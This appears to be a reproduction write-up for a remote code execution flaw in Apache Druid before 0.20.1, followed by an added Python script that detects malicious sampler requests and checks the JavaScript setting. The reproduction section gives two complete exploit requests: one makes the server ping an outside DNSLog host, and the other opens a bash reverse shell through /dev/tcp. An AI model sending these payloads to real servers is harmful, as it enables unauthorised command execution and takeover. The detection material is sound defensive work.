Druid remote command execution
Druid introduction
Druid is a data store designed for high-performance slicing and OLAP analysis on large datasets. Druid is most often used as the data store powering GUI analytics applications, or as the backend for highly concurrent APIs that need fast aggregation.
Affected versions
Apache Druid < 0.20.1
Vulnerability summary
Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for high-trust environments and is disabled by default. However, in Druid 0.20.0 and earlier, an authenticated user who sends a malicious request can exploit this Apache Druid flaw to execute arbitrary code.
Reproduction
- DNSLog
POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 679
Connection: close

{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "quickstart/tutorial/","filter": "wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "json","timestampSpec": {"column": "time","format": "iso"},"dimensionsSpec": {}}},"transformSpec": {"transforms": [],"filter": {"type": "javascript","function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 2mp3kb.dnslog.cn')}","dimension": "added","": {"enabled": "true"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000,"cacheKey": "4ddb48fdbad7406084e37a1b80100214"} }
- Reverse shell
POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 679
Connection: close

{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "quickstart/tutorial/","filter": "wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "json","timestampSpec": {"column": "time","format": "iso"},"dimensionsSpec": {}}},"transformSpec": {"transforms": [],"filter": {"type": "javascript","function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')}","dimension": "added","": {"enabled": "true"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000,"cacheKey": "4ddb48fdbad7406084e37a1b80100214"} }
A returned status code of 200 means the request succeeded.
This vulnerability can only be reproduced after authentication!!!
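From the defender's side, the two things worth automating for the vulnerability summary and the reproduction requests above are (1) spotting ingestion or sampler specs that carry a JavaScript-typed component, including the empty-string `""` key seen in the request bodies above, and (2) confirming that the Druid runtime property `druid.javascript.enabled` (a real Druid setting, disabled by default) has not been turned on. The script below is an added example and is not part of the original page or of the Druid project; the sampler path comes from the requests above, the request bodies and property files it scans are constructed in-line with a harmless placeholder function, and it assumes request bodies are available from a reverse proxy or WAF log.

```python
"""Detection helpers for JavaScript-bearing Druid specs (added example, not Druid code)."""
import json
from typing import Any, Dict, Iterator, Tuple

# Endpoint used in the reproduction requests on this page.
SAMPLER_PATH = "/druid/indexer/v1/sampler"


def find_javascript_nodes(node: Any, path: str = "$") -> Iterator[Tuple[str, dict]]:
    """Walk a parsed spec and yield (json_path, object) for every object typed "javascript".

    Druid accepts JavaScript in several places (filters, transforms, aggregators,
    extraction functions), so the walk is generic rather than tied to one field.
    """
    if isinstance(node, dict):
        if str(node.get("type", "")).lower() == "javascript":
            yield path, node
        for key, val in node.items():
            label = key if key else "<empty>"  # empty-string keys are otherwise invisible
            yield from find_javascript_nodes(val, f"{path}.{label}")
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from find_javascript_nodes(val, f"{path}[{i}]")


def has_empty_key_enable(node: Any) -> bool:
    """True if any object carries the pattern "": {"enabled": "true"} from the request bodies above."""
    if isinstance(node, dict):
        inner = node.get("")
        if isinstance(inner, dict) and str(inner.get("enabled", "")).lower() == "true":
            return True
        return any(has_empty_key_enable(v) for v in node.values())
    if isinstance(node, list):
        return any(has_empty_key_enable(v) for v in node)
    return False


def analyze_request(method: str, path: str, body: str) -> Dict[str, Any]:
    """Classify one captured HTTP request; severity is "none", "medium", "high" or "malformed"."""
    result: Dict[str, Any] = {
        "sampler_endpoint": method.upper() == "POST" and path.split("?")[0] == SAMPLER_PATH,
        "javascript_nodes": [],
        "empty_key_enable": False,
        "severity": "none",
    }
    try:
        spec = json.loads(body)
    except ValueError:
        result["severity"] = "malformed"  # non-JSON body to a JSON endpoint is itself worth a look
        return result
    result["javascript_nodes"] = [p for p, _ in find_javascript_nodes(spec)]
    result["empty_key_enable"] = has_empty_key_enable(spec)
    if result["javascript_nodes"]:
        # JavaScript anywhere in a spec deserves review; combined with the empty-key
        # enable pattern it matches the request shape shown on this page.
        result["severity"] = "high" if result["empty_key_enable"] else "medium"
    return result


def check_runtime_properties(text: str) -> Dict[str, bool]:
    """Parse a runtime.properties fragment (key=value lines) and report the JavaScript setting."""
    props: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, val = line.split("=", 1)
        props[key.strip()] = val.strip()
    explicit = "druid.javascript.enabled" in props
    enabled = props.get("druid.javascript.enabled", "false").lower() == "true"  # default is false
    return {"javascript_enabled": enabled, "explicit": explicit}


# Constructed sample inputs (hypothetical; the JavaScript body is a harmless placeholder).
SUSPICIOUS_BODY = json.dumps({
    "type": "index",
    "spec": {
        "type": "index",
        "ioConfig": {"type": "index", "firehose": {"type": "local", "baseDir": "quickstart/tutorial/"}},
        "dataSchema": {
            "dataSource": "sample",
            "transformSpec": {
                "transforms": [],
                "filter": {"type": "javascript", "function": "function(value){return value > 0}",
                           "dimension": "added", "": {"enabled": "true"}},
            },
        },
    },
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
})
BENIGN_BODY = json.dumps({
    "type": "index",
    "spec": {"type": "index", "dataSchema": {"dataSource": "sample", "transformSpec": {
        "filter": {"type": "selector", "dimension": "added", "value": "1"}}}},
})
WEAK_PROPERTIES = "druid.javascript.enabled=true\n"
HARDENED_PROPERTIES = "# JavaScript execution stays off (the default)\ndruid.javascript.enabled=false\n"

if __name__ == "__main__":
    print(analyze_request("POST", SAMPLER_PATH, SUSPICIOUS_BODY))
    print(analyze_request("POST", SAMPLER_PATH, BENIGN_BODY))
    print(check_runtime_properties(WEAK_PROPERTIES), check_runtime_properties(HARDENED_PROPERTIES))
```

The request check reports the JSON path of every JavaScript-typed object rather than only the filter position used in the requests above, so it also covers JavaScript placed in transforms or aggregators. The configuration check is the mitigation side: with the property absent or `false` and the instance upgraded to 0.20.1 or later, a matching request should be rejected, and a hit on the request check is then a signal that someone holding valid credentials is probing the endpoint.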